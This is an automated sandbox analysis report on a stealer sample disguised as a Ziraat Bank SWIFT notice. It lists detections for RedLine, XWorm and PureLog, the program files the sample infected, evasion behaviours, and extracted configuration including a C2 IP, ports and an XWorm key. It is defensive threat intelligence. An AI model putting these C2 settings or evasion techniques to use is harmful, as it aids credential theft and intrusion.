Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Analysis ID:	1645186
MD5:	cddaeb64c402c6127545f151590c5d20
SHA1:	f62cfcc6347fdfdbe503daaa6b7cdee1ccb1d0ed
SHA256:	8e8b85ca1b4d5b6d629c758ec683a2530e54fc57e51d273e07e5d4f6f016dc72
Tags:	exegeoRedLineStealerTURZiraatBankuser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected XWorm

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%			Perma Link
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 204.10.161.147
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7081
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %AppData%
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XClient.exe

Uses 32bit PE files

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
